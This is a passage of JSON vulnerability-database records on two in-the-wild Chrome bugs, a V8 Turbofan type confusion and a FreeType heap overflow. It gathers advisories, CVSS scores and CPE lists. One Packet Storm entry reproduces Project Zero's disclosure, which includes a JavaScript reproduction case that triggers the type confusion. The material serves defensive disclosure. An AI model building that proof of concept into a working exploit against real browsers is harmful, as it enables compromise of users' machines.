"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2021-02-06T01:35:41", "id": "VERACODE:27808", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-27808/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Chromium V8 Implementation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-16009", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Google Chrome FreeType Memory Corruption", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-15999", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2023-01-31T02:31:43", "description": "CVE-2020-16009: Inappropriate implementation in V8\n\n- https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009\n\nGoogle is aware of reports that exploits for CVE-2020-16009 exist in the wild.\n\nAllowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\nThere is currently little to no public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-02T18:28:47", "type": "osv", "title": "Inappropriate implementation in V8", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2023-01-31T02:31:40", "id": "OSV:GHSA-M7MF-48HP-5QMR", "href": "https://osv.dev/vulnerability/GHSA-m7mf-48hp-5qmr", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:18:58", "description": "\nSergei Glazunov discovered a heap-based buffer overflow vulnerability in\nthe handling of embedded PNG bitmaps in FreeType. Opening malformed fonts\nmay result in denial of service or the execution of arbitrary code.\n\n\nFor Debian 9 stretch, this problem has been fixed in version\n2.6.3-3.2+deb9u2.\n\n\nWe recommend that you upgrade your freetype packages.\n\n\nFor the detailed security status of freetype please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/freetype>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-25T00:00:00", "type": "osv", "title": "freetype - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-08-05T05:18:55", "id": "OSV:DLA-2415-1", "href": "https://osv.dev/vulnerability/DLA-2415-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-31T02:41:15", "description": "### Impact\nA memory corruption bug(Heap overflow) in the FreeType font rendering library.\n\n> This can be exploited by attackers to execute arbitrary code by using specially crafted fonts with embedded PNG images .\n\nAs per https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/ \n\nGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild.\n\n### Patches\nUpgrade to 85.3.130 or higher\n\n### References\n- https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/\n- https://www.zdnet.com/article/google-releases-chrome-security-update-to-patch-actively-exploited-zero-day/\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999\n- https://magpcss.org/ceforum/viewtopic.php?f=10&t=17942\n\nTo review the `CEF/Chromium` patch see https://bitbucket.org/chromiumembedded/cef/commits/cd6cbe008b127990036945fb75e7c2c1594ab10d", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-27T19:47:38", "type": "osv", "title": "Heap buffer overflow in CefSharp", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2023-01-31T02:41:12", "id": "OSV:GHSA-PV36-H7JH-QM62", "href": "https://osv.dev/vulnerability/GHSA-pv36-h7jh-qm62", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-12T01:24:11", "description": "Bulletin has no description", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-01-01T00:00:00", "type": "osv", "title": "In Load_SBit_Png of pngshim.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2021-01-01T00:00:00", "id": "OSV:ASB-A-171232105", "href": "https://osv.dev/vulnerability/ASB-A-171232105", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T07:15:43", "description": "\nSergei Glazunov discovered a heap-based buffer overflow vulnerability in\nthe handling of embedded PNG bitmaps in FreeType. Opening malformed\nfonts may result in denial of service or the execution of arbitrary\ncode.\n\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 2.9.1-3+deb10u2.\n\n\nWe recommend that you upgrade your freetype packages.\n\n\nFor the detailed security status of freetype please refer to its\nsecurity tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/freetype](https://security-tracker.debian.org/tracker/freetype)\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-21T00:00:00", "type": "osv", "title": "freetype - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-08-10T07:15:40", "id": "OSV:DSA-4777-1", "href": "https://osv.dev/vulnerability/DSA-4777-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "redhatcve": [{"lastseen": "2023-02-01T05:15:10", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-03T18:07:25", "type": "redhatcve", "title": "CVE-2020-16009", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2023-02-01T04:32:48", "id": "RH:CVE-2020-16009", "href": "https://access.redhat.com/security/cve/cve-2020-16009", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T08:12:33", "description": "A heap buffer overflow leading to out-of-bounds write was found in freetype. Memory allocation based on truncated PNG width and height values allows for an out-of-bounds write to occur in application memory when an attacker supplies a specially crafted TTF file.\n#### Mitigation\n\nRed Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update as soon as possible. \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-21T18:33:33", "type": "redhatcve", "title": "CVE-2020-15999", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2023-02-01T05:37:22", "id": "RH:CVE-2020-15999", "href": "https://access.redhat.com/security/cve/cve-2020-15999", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "github": [{"lastseen": "2023-02-01T05:08:19", "description": "CVE-2020-16009: Inappropriate implementation in V8\n\n- https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009\n\nGoogle is aware of reports that exploits for CVE-2020-16009 exist in the wild.\n\nAllowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\nThere is currently little to no public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-02T18:28:47", "type": "github", "title": "Inappropriate implementation in V8", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2023-02-01T05:05:09", "id": "GHSA-M7MF-48HP-5QMR", "href": "https://github.com/advisories/GHSA-m7mf-48hp-5qmr", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T05:08:20", "description": "### Impact\nA memory corruption bug(Heap overflow) in the FreeType font rendering library.\n\n> This can be exploited by attackers to execute arbitrary code by using specially crafted fonts with embedded PNG images .\n\nAs per https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/ \n\nGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild.\n\n### Patches\nUpgrade to 85.3.130 or higher\n\n### References\n- https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/\n- https://www.zdnet.com/article/google-releases-chrome-security-update-to-patch-actively-exploited-zero-day/\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999\n- https://magpcss.org/ceforum/viewtopic.php?f=10&t=17942\n\nTo review the `CEF/Chromium` patch see https://bitbucket.org/chromiumembedded/cef/commits/cd6cbe008b127990036945fb75e7c2c1594ab10d", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-27T19:47:38", "type": "github", "title": "Heap buffer overflow in CefSharp", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2023-02-01T05:05:07", "id": "GHSA-PV36-H7JH-QM62", "href": "https://github.com/advisories/GHSA-pv36-h7jh-qm62", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2020-11-09T19:28:33", "description": "", "cvss3": {}, "published": "2020-11-09T00:00:00", "type": "packetstorm", "title": "Chrome V8 Turbofan Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16009"], "modified": "2020-11-09T00:00:00", "id": "PACKETSTORM:159974", "href": "https://packetstormsecurity.com/files/159974/Chrome-V8-Turbofan-Type-Confusion.html", "sourceData": "`V8: Turbofan fails to deoptimize code after map deprecation, leading to type confusion \n \nNOTE: We have evidence that the following bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline. \n \nVULNERABILITY DETAILS \n \nWhen turbofan compiles code that performs a Map transition, it usually installs a CodeDependency so that the resulting code is deoptimized should the target Map ever be deprecated (meaning that the code should now transition to a different Map). This is done through the TransitionDependencyOffTheRecord function [1]. This function will only install the dependency if the target Map can be deprecated, which is determined by Map::CanBeDeprecated [2], shown next \n \nbool Map::CanBeDeprecated() const { \nfor (InternalIndex i : IterateOwnDescriptors()) { \nPropertyDetails details = instance_descriptors(kRelaxedLoad).GetDetails(i); \nif (details.representation().IsNone()) return true; \nif (details.representation().IsSmi()) return true; \nif (details.representation().IsDouble() && FLAG_unbox_double_fields) <--- \nreturn true; \nif (details.representation().IsHeapObject()) return true; \nif (details.kind() == kData && details.location() == kDescriptor) { \nreturn true; \n} \n} \nreturn false; \n} \n \nAs can be seen, this function assumes that a Map storing only fields of type Double or Tagged can not be deprecated if FLAG_unbox_double_fields is false, which is the case if pointer compression is enabled (the default on x64). This appears to be incorrect, as the following code demonstrated: \n \n// Requires --nomodify-field-representation-inplace \n \nfunction poc() { \nfunction hax(o) { \no.a = 13.37; \n} \n \nlet o1 = {}; \nfor (let i = 0; i < 100000; i++) { \nlet o = i == 1000 ? {} : o1; \nhax(o); \n} \n \nlet o2 = {}; \no2.a = {}; \n// Map1 is now deprecated \n// %HaveSameMap(o2, o1) === false \n \nlet o3 = {}; \nhax(o3); \n// o3 was now transitioned to a deprecated map \n%DebugPrint(o3); \n// ... \n// - deprecated_map \n} \n%NeverOptimizeFunction(poc); \npoc(); \n \nThis code ends up performing a new transition to a deprecated map. \n \nThis bug can be exploited when combined with the in-place field generalization mechanism. In short, the idea is to \n \n1. JIT compile a function that performs a transition from map1{a:double} to map2{a:double,b:whatever} \n2. Deprecate map2. This does not deoptimize the JIT code since map2 was thought to not be deprecatable \n3. In-place generalize map1.a to type tagged. This will not also generalize map2 since it is deprecated. \n4. Execute the JIT code. This will effectively transition from map1{a:tagged} to map2{a:double,b:whatever}, which is incorrect and results in a type confusion. \n \nThe following code achieves that and causes a check failure in debug builds: \\\"Debug check failed: value.IsHeapNumber().\\\" while printing (presumably) an address in release builds. \n \nREPRODUCTION CASE \n// Tested on v8 built from current HEAD (dd84c3937058b086b6b7a412ac352179e20bd9c7) \n// Requires --allow-natives-syntax \n \nfunction assert(c) { \nif (!c) { throw \\\"Assertion failed\\\"; } \n} \n \nfunction assertFalse(c) { \nassert(!c); \n} \n \nfunction poc() { \nfunction hax(o) { \no.c = 13.37; \n} \n \nfunction makeObjWithMap5() { \nlet o = {}; \no.a = 13.37; \no.b = {}; \nreturn o \n} \n \n// Create a bunch of Maps. See the assertions for their relationships \n \nlet m1 = {}; \n \nlet m2 = {}; \nassert(%HaveSameMap(m2, m1)); \nm2.a = 13.37; \n \nlet m3 = {}; \nm3.a = 13.37; \nassert(%HaveSameMap(m3, m2)); \nm3.b = 1; \n \nlet m4 = {}; \nm4.a = 13.37; \nm4.b = 1; \nassert(%HaveSameMap(m4, m3)); \nm4.c = {}; \n \nlet m4_2 = {}; \nm4_2.a = 13.37; \nm4_2.b = 1; \nm4_2.c = {}; \nassert(%HaveSameMap(m4_2, m4)); \n \nlet m5 = {}; \nm5.a = 13.37; \nassert(%HaveSameMap(m5, m2)); \nm5.b = 13.37; \nassertFalse(%HaveSameMap(m5, m3)); \n \n// At this point, Map3 and Map4 are both deprecated. Map2 transitions to Map5. \n// Map5 is the migration target for Map3. The Migration target for Map4 is a new Map \nassertFalse(%HaveSameMap(m5, m3)); \n \nlet m6 = makeObjWithMap5(); \nassert(%HaveSameMap(m6, m5)); \nhax(m6); \n \nlet kaputt = makeObjWithMap5(); \nassert(%HaveSameMap(kaputt, m5)); \n \nfor (let i = 0; i < 100000; i++) { \nlet o = i == 1337 ? makeObjWithMap5() : m6; \nhax(o); \n} \n \n// Map4 is deprecated, so this property access triggers a Map migration. \n// This will end up creating a new Map, Map7, to which both Map4 and Map6 \n// migrate. Map5's transition entry afterwards points to Map7 and no \n// longer to Map6. Map6 is deprecated. \nlet m7 = m4_2; \nassert(%HaveSameMap(m7, m4)); \nm7.c; \nassertFalse(%HaveSameMap(m7, m4)); \n \n// However, hax was not deoptimized and still transitions to Map6 because \n// Map::CanBeDeprecated returns false for it. \n \n// This does a in-place map generalization of Map5 and Map7, but not Map6. \n// Map6 still indicates that .a should be a double field. \nkaputt.a = \\\"asdf\\\"; \nassert(%HaveSameMap(kaputt, m5)); \n \n// This now migrates to the wrong map (Map6) because hax was not deoptimized. \n// This is incorrect because .a now stores a HeapObject and not a double. \nhax(kaputt); \n \n// This now fails in debug builds \n%HeapObjectVerify(kaputt); \n \n// This prints (presumably) an address in release builds \nconsole.log(kaputt.a); \n} \n%NeverOptimizeFunction(poc); \n \npoc(); \n \n \nCREDIT INFORMATION \nClement Lecigne of Google's Threat Analysis Group and Samuel Gro\\u00df of Google Project Zero \n \nNOTE: We have evidence that the following bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline. \n \n[1] https://source.chromium.org/chromium/chromium/src/+/master:v8/src/compiler/compilation-dependencies.cc;l=641;drc=b4ed955a8e69c4f5fad8fc5ead483571298f1a81;bpv=1;bpt=1 \n[2] https://source.chromium.org/chromium/chromium/src/+/master:v8/src/objects/map-inl.h;l=563;drc=b4ed955a8e69c4f5fad8fc5ead483571298f1a81;bpv=1;bpt=1 \n \n \nRelated CVE Numbers: CVE-2020-16009. \n \n \n \nFound by: saelo@google.com \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159974/GS20201109192056.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:07:02", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-03T03:15:00", "type": "cve", "title": "CVE-2020-16009", "cwe": ["CWE-787", "CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:opensuse:leap:15.1", "cpe:/a:opensuse:backports_sle:15.0", "cpe:/o:opensuse:leap:15.2", "cpe:/o:fedoraproject:fedora:33"], "id": "CVE-2020-16009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16009", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:sp2:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:06:44", "description": "Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 